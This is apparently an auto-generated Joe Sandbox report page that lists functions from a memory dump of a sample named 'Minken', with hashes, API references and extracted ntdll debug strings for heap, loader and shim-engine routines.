Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31b38f33072ad174f9cef2e3dc92763df0c92a84f8980eb5190a004d4aef7055
Instruction ID: 8de5df59fa335d1f82ebd7553ba4f17df3e524ce85cd5fbe4d8042180c5280f2
Opcode Fuzzy Hash: 31b38f33072ad174f9cef2e3dc92763df0c92a84f8980eb5190a004d4aef7055
Instruction Fuzzy Hash: 749002A5B01504434140719C4844416680557E1302395D155A0555520C86188A55D2A9

Uniqueness

Uniqueness Score: -1.00%

Function 23192B60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2396567b72afbe55f4bc3d7064e620d5eadeeb5f7167a651626fa08c5922c05a
Instruction ID: fa55b25b7ef40437c1c7256b4972d7e49c3ebd584737410f2ac71ef05a957028
Opcode Fuzzy Hash: 2396567b72afbe55f4bc3d7064e620d5eadeeb5f7167a651626fa08c5922c05a
Instruction Fuzzy Hash: 099002A5702404034105719C4454626480A47E0202B55D061E1015550DC5258A91A165

Uniqueness

Uniqueness Score: -1.00%

Function 2322A670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 2322A6DD
RtlDebugPrintTimes.NTDLL ref: 2322A771
RtlDebugPrintTimes.NTDLL ref: 2322A794
RtlDebugPrintTimes.NTDLL ref: 2322A7C0
RtlDebugPrintTimes.NTDLL ref: 2322A895
RtlDebugPrintTimes.NTDLL ref: 2322A8E8
RtlDebugPrintTimes.NTDLL ref: 2322A907
RtlDebugPrintTimes.NTDLL ref: 2322A938

Strings

HEAP: , xrefs: 2322A686

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: a9401d2486cd0cdcb1c3eca22c0da9e5a5372c11e0306837d2da86476c5be683
Instruction ID: aff48f43fa95a570f61f149b2c5d395d4943daa5ef99edfed4a9c0252ecafd7e
Opcode Fuzzy Hash: a9401d2486cd0cdcb1c3eca22c0da9e5a5372c11e0306837d2da86476c5be683
Instruction Fuzzy Hash: 02A1BE71A14B028FE714DF18CC94A1ABBE5BF88710F0945ADEA45DB711EB70DD82CB92

Uniqueness

Uniqueness Score: -1.00%

Function 23187630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 231C4655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 231C46FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 231C4725
Execute=1, xrefs: 231C4713
ExecuteOptions, xrefs: 231C46A0
CLIENT(ntdll): Processing section info %ws..., xrefs: 231C4787
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 231C4742

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: acdce9edbe24b600647aa9a79b13f040ca0d14ef61c4e81da08d63bee2c699e2
Instruction ID: 2b0d0dc671ab09f14fb863374feb911d86aa13425d884a23eece3b125e043c91
Opcode Fuzzy Hash: acdce9edbe24b600647aa9a79b13f040ca0d14ef61c4e81da08d63bee2c699e2
Instruction Fuzzy Hash: 47512735A003196BFB21AFA4DC89FE977A8AF29300F1400E9D604A7181EB719B45CF59

Uniqueness

Uniqueness Score: -1.00%

Function 2316A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Actx , xrefs: 231B7A0C, 231B7A73
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 231B7AE6
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 231B79D5
SsHd, xrefs: 2316A3E4
RtlpFindActivationContextSection_CheckParameters, xrefs: 231B79D0, 231B79F5
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 231B79FA

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 120657fbf610a18cc150e7757ef9850f2ece48db9f17b3e27eea4309fbb6764f
Instruction ID: 1a5ecd9cca0f1bcf6eddd677d6ce641b2c6f1eb9050433fefceece73396d4494
Opcode Fuzzy Hash: 120657fbf610a18cc150e7757ef9850f2ece48db9f17b3e27eea4309fbb6764f
Instruction Fuzzy Hash: 70E1DFB06043018FD710CF64C894B9ABBF5BF88254F190AADE9A5CB2D1D731DBD58B82

Uniqueness

Uniqueness Score: -1.00%

Function 2316D770 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 231B948C

Strings

GsHd, xrefs: 2316D874
RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 231B9565
Actx , xrefs: 231B9508
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 231B9346
RtlpFindActivationContextSection_CheckParameters, xrefs: 231B9341, 231B9366
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 231B936B

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: e7ac178c4d903c1e291c02065df84b99187220ba94a268d08940c5ae2bddec8c
Instruction ID: 3fde4fe42b1564530ca221dc297cd2114c21fb190ada0191416a6870e4125f79
Opcode Fuzzy Hash: e7ac178c4d903c1e291c02065df84b99187220ba94a268d08940c5ae2bddec8c
Instruction Fuzzy Hash: 53E1B1706043018FD710DF65C880B9AB7F5BF88318F084AAEE9958B295D771DB95CF52

Uniqueness

Uniqueness Score: -1.00%

Function 231FF525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 231FF556

Strings

Just allocated block at %p for %Ix bytes, xrefs: 231FF708
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 231FF809
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 231FF7BE
RtlAllocateHeap, xrefs: 231FF56D
HEAP: , xrefs: 231FF6F4, 231FF7A1, 231FF7F8
HEAP[%wZ]: , xrefs: 231FF6E7, 231FF794, 231FF7EB

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 872aff315f3f9633f6828c70c0d1d87e36ad15c072ee7a5efb4ad005c2e54660
Instruction ID: 3d738191b382899c0decc12b10971eef10ade929cf4a99fa00cb4d48b26684f7
Opcode Fuzzy Hash: 872aff315f3f9633f6828c70c0d1d87e36ad15c072ee7a5efb4ad005c2e54660
Instruction Fuzzy Hash: CE91FE35900740DFDB11DFA8C480AEDBBF2FF59714F198099E554AB2A2CBB59B81CB14

Uniqueness

Uniqueness Score: -1.00%

Function 2314645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 2314656C

Part of subcall function 231465B5: RtlDebugPrintTimes.NTDLL ref: 23146664
Part of subcall function 231465B5: RtlDebugPrintTimes.NTDLL ref: 231466AF

Strings

minkernel\ntdll\ldrinit.c, xrefs: 231A9A11, 231A9A3A
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 231A9A2A
Getting the shim engine exports failed with status 0x%08lx, xrefs: 231A9A01
LdrpInitShimEngine, xrefs: 231A99F4, 231A9A07, 231A9A30
apphelp.dll, xrefs: 23146496
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 231A99ED

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: 499c6b70ad75520f0fc89d8e243c129c55c5eb74743f8acbcc75b09be535b2a5
Instruction ID: be2138dfdaa791d5814a7e085408a231f63eed55e1e67c1dca3e2fef82ebb843
Opcode Fuzzy Hash: 499c6b70ad75520f0fc89d8e243c129c55c5eb74743f8acbcc75b09be535b2a5
Instruction Fuzzy Hash: E551D0716183049FE320EF24C980F9B77E8EF94685F01499AF6959B165DB30EB84CB92

Uniqueness

Uniqueness Score: -1.00%

Function 231465B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 23146664
RtlDebugPrintTimes.NTDLL ref: 231466AF

Strings

minkernel\ntdll\ldrinit.c, xrefs: 231A9AC5, 231A9B06
LdrpLoadShimEngine, xrefs: 231A9ABB, 231A9AFC
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 231A9AF6
Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 231A9AB4

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: 4cc21e1c000361f25f3a92d4128957b68110892d2e87290bc2afe99083efabbd
Instruction ID: f304f8a197073e683c3b1793ad9d026e883765d7499ae2faf89c936aaaaf449c
Opcode Fuzzy Hash: 4cc21e1c000361f25f3a92d4128957b68110892d2e87290bc2afe99083efabbd
Instruction Fuzzy Hash: FF513731A003589FDB18EBA8CC88EDD77B5BB60308F054195E751EB29ACB749E80CB90

Uniqueness

Uniqueness Score: -1.00%

Function 2317DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 231BF611

Strings

HEAP: , xrefs: 231BF647
HEAP[%wZ]: , xrefs: 231BF63A
, passed to %s, xrefs: 231BF662
RtlUnlockHeap, xrefs: 231BF65D
Invalid heap signature for heap at %p, xrefs: 231BF653

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
Opcode ID: 5db3a0b8d0c4172ea0e6a105f41c1269a37ccc74459db580a96d855620611b41
Instruction ID: ac6c7af508691795f7aaf5c47c791471b4ae7bfb18b5485c32229d8c58356132
Opcode Fuzzy Hash: 5db3a0b8d0c4172ea0e6a105f41c1269a37ccc74459db580a96d855620611b41
Instruction Fuzzy Hash: 12414671A00744EFC311EF64C899B9AB7F5EF15360F1981EAD94197292C738ABC0CB91

Uniqueness

Uniqueness Score: -1.00%

Function 2319B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 2319B6BF

Strings

0, xrefs: 2319B695
-, xrefs: 2319B650
+, xrefs: 2319B65A
0, xrefs: 2319B66F

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 4b86d4d7736987804036db34ba5181622e3256f80aeed1ff92acff99ff1da47e
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: B181AF70E452499FFF089F68C891BEEBBA6AF45350F18C2D9D850A73D1C634AB808B55

Uniqueness

Uniqueness Score: -1.00%

Function 23159126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 231B2559

Strings

@, xrefs: 23159175
$, xrefs: 23159191

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: de482174b70468f76f896f03a49fee5595a69284faa641ba8d79cd98be8c527f
Instruction ID: 5a2f8e7e03f5cfad2b9498185cf6cb34affda41427483e9fcdbfc0394c819024
Opcode Fuzzy Hash: de482174b70468f76f896f03a49fee5595a69284faa641ba8d79cd98be8c527f
Instruction Fuzzy Hash: 31813AB1D002699BDB25DB94CC44BDEB7B9AF08750F0041EAEA19B7280D7709F85CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 2317245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 231BA9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 231BA992
apphelp.dll, xrefs: 23172462
LdrpDynamicShimModule, xrefs: 231BA998

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 8d7b296468c773149ec9bfc0d36073534dcf3e4b7b45e06108ade5ef77c93609
Instruction ID: 972efe84db77d9f798b4515ea39f535a83864b25dc51c4c24f43d3c51ba49f77
Opcode Fuzzy Hash: 8d7b296468c773149ec9bfc0d36073534dcf3e4b7b45e06108ade5ef77c93609
Instruction Fuzzy Hash: 6A313931A00201EFD714BF68D984E9AB7B9FB94700F1A40D9FB11A7281D774DB82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 2317F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 231C031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 231C02BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 231C02E7

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 82e48adab199f73d4d8e35cc8e9cf5311a66a35d8c3f895fe7d71710e3e613f8
Instruction ID: d68564daa77d09523cbe9b09f1a21b2944f1307e135b0d495b92d700e65c2429
Opcode Fuzzy Hash: 82e48adab199f73d4d8e35cc8e9cf5311a66a35d8c3f895fe7d71710e3e613f8
Instruction Fuzzy Hash: C6E1AE306087819FD720DF28C880B9AB7F4BF98354F184A9DF5A58B2D1D774DA45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 2318B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 231C728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 231C7294
RTL: Re-Waiting, xrefs: 231C72C1
RTL: Resource at %p, xrefs: 231C72A3

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 745dc223d691bb108df049462699a926790cbae17999ddaa5d21968fa55f9ef1
Instruction ID: 121f4dfe5b5ce6adc91463c7c17712b5ddd4f1a93679d06876d8ee43c76b606d
Opcode Fuzzy Hash: 745dc223d691bb108df049462699a926790cbae17999ddaa5d21968fa55f9ef1
Instruction Fuzzy Hash: A8413232600746AFD720CE25CC41F9AB7A5FF68320F144A98F955EB240DB70EA42CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 2322A4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 2322A577
RtlDebugPrintTimes.NTDLL ref: 2322A62A
RtlDebugPrintTimes.NTDLL ref: 2322A64E
RtlDebugPrintTimes.NTDLL ref: 2322A663

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 611766ec76683f95ea16587a7202b02fd4ba9630f5f6872e7945fa5ffffb9fc5
Instruction ID: e9658946ef9f5e61d4702ddc455d7e7e6af34d210544e561cbbb2ce032215cbd
Opcode Fuzzy Hash: 611766ec76683f95ea16587a7202b02fd4ba9630f5f6872e7945fa5ffffb9fc5
Instruction Fuzzy Hash: 2F515D35B10A129FEB08DE58CCA5A2A7BF5FB49310B1441ADDA06DBB11DF74ED91CB80

Uniqueness

Uniqueness Score: -1.00%

Function 231CF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 231CF26D
RtlDebugPrintTimes.NTDLL ref: 231CF292
RtlDebugPrintTimes.NTDLL ref: 231CF324
RtlDebugPrintTimes.NTDLL ref: 231CF378

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 19ac4ae39302ab767f4a19ed14b4b8229f20fee304740f8dc4461e8ebd7752cc
Instruction ID: 29a1d6c9e9beae60b5dc609eef97f1aaa53ec3f4e16a9697459f2af00620df4d
Opcode Fuzzy Hash: 19ac4ae39302ab767f4a19ed14b4b8229f20fee304740f8dc4461e8ebd7752cc
Instruction Fuzzy Hash: EF5143B6E00359AFDF08CF98C845ADCBBB5BF58310F1581AAE915BB250D3389A41CF55

Uniqueness

Uniqueness Score: -1.00%

Function 23187B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 23187B52
BaseThreadInitThunk.KERNEL32 ref: 23187B5C
RtlDebugPrintTimes.NTDLL ref: 231C49ED
RtlDebugPrintTimes.NTDLL ref: 231C4A70

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: 0b122b37e813fdf72e8387d0c570d1e38127e00997314e4ec2cb312f6e865e4e
Instruction ID: 4fd5ceba08c010c301f24c6d5d13cd50a1034a6f1b07d7d761460f95099ca60f
Opcode Fuzzy Hash: 0b122b37e813fdf72e8387d0c570d1e38127e00997314e4ec2cb312f6e865e4e
Instruction Fuzzy Hash: 50313A75E046289FCF15EFA8C885A9DBBF0FB68710F108569E512B7290DB359A00CF54

Uniqueness

Uniqueness Score: -1.00%

Function 231504E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 2315055E

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2315063D
kLsE, xrefs: 23150540

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
